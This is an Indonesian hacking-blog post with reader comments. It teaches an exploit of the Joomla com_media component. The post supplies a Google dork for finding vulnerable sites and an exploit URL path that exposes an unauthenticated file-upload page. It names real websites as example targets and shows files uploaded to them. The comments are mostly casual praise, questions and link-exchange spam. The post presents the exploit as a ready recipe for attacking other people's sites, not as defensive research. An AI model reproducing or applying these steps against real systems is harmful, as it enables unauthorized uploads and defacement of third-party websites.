Teknik Exploit Com_Media pada CMS Joomla – Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.
Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :
4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.
Refrensi : http://komandanseo.blogspot.com/
ope says
Exploit com_media itu apa ya?
chiaki says
???
Agung Skat Nevis says
Visit back 😀
And izin copassss =)
http://www.bloggerjava.net/
Wahyu Dwi says
rada nggak mudeng sob sama joomla 😀 hhehehe tapi pelan2 aja deh blajarnya 🙂
chiaki says
Sip.
Bung Penho says
kalo bisa lebih rinci lagi nih tentang teknik ini buat apa?
chiaki says
Ini post nya di label apa ? :p
Info Seputar Bola says
terimakasih sudah berbagi nih mas . rupanya bugs nya cukup mudah untuk d tembuss ..
chiaki says
Benar sob.
Rohis Facebook says
nyimak aja deh gk bs komen apa2 soalx gk ngerti *smile
chiaki says
Oke.
imam sya' roni says
meneruskan warisan nih kang dari sultan haikal 🙂 sipp
chiaki says
Thanks bro.
mifta khuddin says
mengapa php dan html gk bisa d'upload..??
chiaki says
Gak tau. :3
Mas Nady says
kunjungan sore, nyimak saja dech sobat… nggak paham, hahahaha
Muroi El-Barezy says
Wah joomla, kayanya nyimak dulu sob, happy blogging
aji Fauzan says
mantep gan (y)
Djangkaru Bumi says
saya belajar joomla jadi pening sendiri.
Muhammad Rafly says
Gan Tukeran Link Yuk..
Dah Ane Pasang Link Madura Di Blog Ane Cek Yo..
http://mrr-cyber.blogspot.com/p/link-exchange_1033.html
chiaki says
Ntar malem ya bro. Skrg ol hp. :3
Muhammad Rafly says
Oke Gan..
Wahyu Dwi says
kunjungan pagi sob 🙂
Cirebon-Cyber4rt says
paling suka ane kalo post gini hehehe 😀
oh iya lama juga ngga BW dimari, apa kabar gan? 🙂
chiaki says
Baik bro. 😀
Mas Nady says
wah saya nyimak saja dech sob.. saya masih awam banget sama yang beginian hehehehe
Anonim says
Blog Cacad
Anonim says
asu